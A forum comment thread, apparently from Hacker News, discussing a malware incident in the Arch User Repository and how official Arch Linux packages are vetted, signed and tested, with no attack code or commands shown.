Comment by ploxiln
8 years ago
Packages are vetted, in the repos, just not in AUR.
They also keep tools that would easily/automatically build and install packages from AUR out of the main repos, to encourage manual handling and individual consideration of AUR package build scripts.
Also this malware was found in AUR within a few hours of it going up.
Exactly. It's actually kind of a success story for the AUR, since they found the malware so quickly.
Of course, it would be more interesting if we could scan or survey the AUR to get a percentage of suspicious packages. I've long been under the impression that some popular AUR packages (e.g. Google Chrome) are pretty safe from tampering. For anything else, I glance over the PKGBUILD to make sure it's not doing anything obviously fishy, and I've never noticed anything.
How are official Arch packages vetted?
They are built by the core Arch developers, or as in the case of the 'community' repo, by 'Trusted Users', the latter being people who have done high quality maintaining of packages in the AUR and shown good community involvement.
Having met these criterias, they need to be sponsored by an existing TU, and then it will be put up to a vote.
Do you know if there is any kind of review process? For example, let’s say a core maintainer’s machine is compromised and the attacker submits a new package on their behalf. Does anyone else need to review and sign off on the new package?
Thank you!
Depends on what you deem "vetted". Builds from source from a trusted source. Try ask if they can PGP sign their sources. Builds fine. Pushed to the repos. If its an package from core or extra it goes through testing for a few days.
Also been a push towards reproducible builds, and the stones have been laid with pacman 5.1.